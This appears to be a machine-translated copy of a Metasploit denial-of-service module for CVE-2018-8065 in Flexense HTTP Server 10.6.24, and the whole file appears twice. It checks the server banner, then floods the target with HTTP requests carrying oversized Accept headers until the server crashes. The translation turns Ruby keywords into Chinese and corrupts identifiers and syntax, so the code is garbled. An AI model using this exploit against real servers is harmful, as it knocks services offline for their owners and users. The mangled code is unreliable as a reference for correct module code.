##
#利用标题: Flexense HTTP服务器10.6.24-缓冲区溢出(DOS)(Metasploit)
#日期: 2018-03-09
#利用作者: EGE BALCI
#供应商homepage3360 https://www.flexense.com/downloads.html
#版本:=10.6.24
#CVE : CVE-2018-8065
#此模块需要Metasploit: https://metasploit.com/download
#当前源: https://github.com/RAPID7/METASPLOIT-FRAMEWORK
##
类MSF:AUXILARIY
包括MSF:AUXILIARY
OS
包括MSF:EXPLOIT:REMOTE3:TCP
def初始化(info={})
super(update_info(信息,
'name'=“ flexense http服务器拒绝服务”,
'description'=%q {
该模块触发了Flexense HTTP服务器中拒绝服务漏洞。
用户模式引起的漏洞写入访问记忆违反,可以触发
快速发送具有长HTTP标头值的HTTP请求的多种。
据报道,使用Flexense HTTP服务器10.6.24及以下服务的多个Flexense应用程序据报道脆弱。
},
'作者'=['ege balci [email protected]'],
'许可证'=msf_license,
'参考'=
[
['cve','2018-8065'],
['url','https://github.com/egebalci/sync_breeze_enterprise_10_6_24_-dos'],
],
'Dibleosuretate'='2018-03-09'))))
register_options(
[
OPT:RPORT(80),
optString.new('packetCount',[true,'要发送的数据包数(推荐的:在1725上方)',1725]),),),),),),),)
optString.new('Packetsize',[true,'Accept标头中的字节数(推荐: 4088-5090',Rand(4088.5090)])
)))
结尾
DEF检查
开始
连接
sock.put('get/http/1.0 \ r \ n \ r \ n')
res=sock.get
如果res and res.ixclude? 'Flexense HTTP服务器v10.6.24'
exploit:checkCode:Appears
别的
Exploit:checkCode:SAFE
结尾
REX REX: ConnectionRefuse
print_error(“目标拒绝连接”)
exploit:checkcode:unknown
救援
print_error(“目标没有响应HTTP请求”)
exploit:checkcode:unknown
结尾
结尾
def运行
除非check==exploit3:3360checkcode:3360Appears
FAIL_WITH(失败:不效法,“目标不脆弱。”)
结尾
size=datastore ['packetsize']。to_i
print_status('从#{size} -byte字符串的数据包开始)
计数=0
循环做
有效载荷=''
有效载荷'get /' + rex:Text.rand_text_alpha(rand(30)) +'http /1.1 \ r \ n'
有效载荷'host: 127.0.0.1 \ r \ n'
有效载荷'Accept:'+('A' * size)+'\ r \ n'
有效载荷'\ r \ n \ r \ n'
开始
连接
袜子(有效载荷)
断开
计数+=1
如果count==datastore ['packetCount']中断
救援:REX:3:InvalidDestination
print_error('无效目的地!继续.')
Rescue :Rex:3360ConnectionTimeOut
print_error('连接超时!继续.')
救援:errno:Econnreset
print_error('连接重置!继续.')
Rescue :Rex:3360ConnectionRefused
print_good('dos成功#{count}的数据包,带有#{size} - byte headers')
返回true
结尾
结尾
print_error('DOS在#{count}#{size} -byte strings'的数据包'之后失败)
结尾
结尾
#利用标题: Flexense HTTP服务器10.6.24-缓冲区溢出(DOS)(Metasploit)
#日期: 2018-03-09
#利用作者: EGE BALCI
#供应商homepage3360 https://www.flexense.com/downloads.html
#版本:=10.6.24
#CVE : CVE-2018-8065
#此模块需要Metasploit: https://metasploit.com/download
#当前源: https://github.com/RAPID7/METASPLOIT-FRAMEWORK
##
类MSF:AUXILARIY
包括MSF:AUXILIARY

包括MSF:EXPLOIT:REMOTE3:TCP
def初始化(info={})
super(update_info(信息,
'name'=“ flexense http服务器拒绝服务”,
'description'=%q {
该模块触发了Flexense HTTP服务器中拒绝服务漏洞。
用户模式引起的漏洞写入访问记忆违反,可以触发
快速发送具有长HTTP标头值的HTTP请求的多种。
据报道,使用Flexense HTTP服务器10.6.24及以下服务的多个Flexense应用程序据报道脆弱。
},
'作者'=['ege balci [email protected]'],
'许可证'=msf_license,
'参考'=
[
['cve','2018-8065'],
['url','https://github.com/egebalci/sync_breeze_enterprise_10_6_24_-dos'],
],
'Dibleosuretate'='2018-03-09'))))
register_options(
[
OPT:RPORT(80),
optString.new('packetCount',[true,'要发送的数据包数(推荐的:在1725上方)',1725]),),),),),),),)
optString.new('Packetsize',[true,'Accept标头中的字节数(推荐: 4088-5090',Rand(4088.5090)])
)))
结尾
DEF检查
开始
连接
sock.put('get/http/1.0 \ r \ n \ r \ n')
res=sock.get
如果res and res.ixclude? 'Flexense HTTP服务器v10.6.24'
exploit:checkCode:Appears
别的
Exploit:checkCode:SAFE
结尾
REX REX: ConnectionRefuse
print_error(“目标拒绝连接”)
exploit:checkcode:unknown
救援
print_error(“目标没有响应HTTP请求”)
exploit:checkcode:unknown
结尾
结尾
def运行
除非check==exploit3:3360checkcode:3360Appears
FAIL_WITH(失败:不效法,“目标不脆弱。”)
结尾
size=datastore ['packetsize']。to_i
print_status('从#{size} -byte字符串的数据包开始)
计数=0
循环做
有效载荷=''
有效载荷'get /' + rex:Text.rand_text_alpha(rand(30)) +'http /1.1 \ r \ n'
有效载荷'host: 127.0.0.1 \ r \ n'
有效载荷'Accept:'+('A' * size)+'\ r \ n'
有效载荷'\ r \ n \ r \ n'
开始
连接
袜子(有效载荷)
断开
计数+=1
如果count==datastore ['packetCount']中断
救援:REX:3:InvalidDestination
print_error('无效目的地!继续.')
Rescue :Rex:3360ConnectionTimeOut
print_error('连接超时!继续.')
救援:errno:Econnreset
print_error('连接重置!继续.')
Rescue :Rex:3360ConnectionRefused
print_good('dos成功#{count}的数据包,带有#{size} - byte headers')
返回true
结尾
结尾
print_error('DOS在#{count}#{size} -byte strings'的数据包'之后失败)
结尾
结尾